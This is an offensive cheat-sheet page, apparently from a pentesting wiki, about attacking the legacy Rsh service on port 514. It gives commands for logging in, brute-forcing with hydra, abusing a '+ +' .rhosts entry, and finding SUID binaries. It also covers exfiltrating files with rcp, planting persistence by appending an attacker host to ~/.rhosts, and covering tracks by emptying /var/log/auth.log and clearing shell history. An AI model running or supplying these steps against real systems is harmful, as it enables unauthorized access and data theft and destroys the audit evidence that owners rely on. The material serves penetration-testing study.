Rsh - Port 514

Become VeryLazyTech member! 🎁

Basic Info

For authentication, .rhosts files along with /etc/hosts.equiv were utilized by Rsh. Authentication was dependent on IP addresses and the Domain Name System (DNS). The ease of spoofing IP addresses, notably on the local network, was a significant vulnerability.

Moreover, it was common for the .rhosts files to be placed within the home directories of users, which were often located on Network File System (NFS) volumes.

Default port: 514

Login

rsh <IP> <Command>
rsh <IP> -l domain\user <Command>
rsh domain/user@<IP> <Command>
rsh domain\\user@<IP> <Command>

Attack Vectors

Exploiting Weak Authentication

Check for weak authentication mechanisms. RSH often relies on the .rhosts file for authentication, which can be easily exploited if not properly configured.

Brute Force Attacks

You can perform brute-force attacks to guess weak passwords using tools like hydra:

hydra -l <username> -P /path/to/passwords.txt <target_ip> rsh

This command attempts to brute-force the specified RSH server.

Exploiting Misconfigurations

Look for misconfigured .rhosts files that allow unauthorized access. For example, a .rhosts file with the following entry can be exploited:

+ +

This entry allows any user from any host to log in without a password.


Post-Exploitation

Privilege Escalation

After gaining access, attempt to escalate privileges to a higher-level account. One common method is to search for SUID binaries:

rsh <remote-server-ip> -l <username> find / -perm -4000 -type f 2>/dev/null

This command lists all SUID binaries, which could potentially be exploited for privilege escalation.

Data Exfiltration

Once you have access, you can exfiltrate data from the remote machine. For example, you can copy files using the rcp (remote copy) command:

rcp <remote-server-ip>:<remote-file-path> <local-file-path>

Persistent Access

To maintain persistent access, you can add your SSH key to the ~/.ssh/authorized_keys file or modify the .rhosts file to allow your host:

echo "attacker-ip attacker-user" >> ~/.rhosts

This entry grants login permissions to the specified user on the attacker's IP address.

Covering Tracks

It's crucial to cover your tracks to avoid detection. You can delete log entries related to your activities:

rsh <remote-server-ip> -l <username> echo "" > /var/log/auth.log
rsh <remote-server-ip> -l <username> history -c

These commands clear the authentication log and command history.


Last updated

Was this helpful?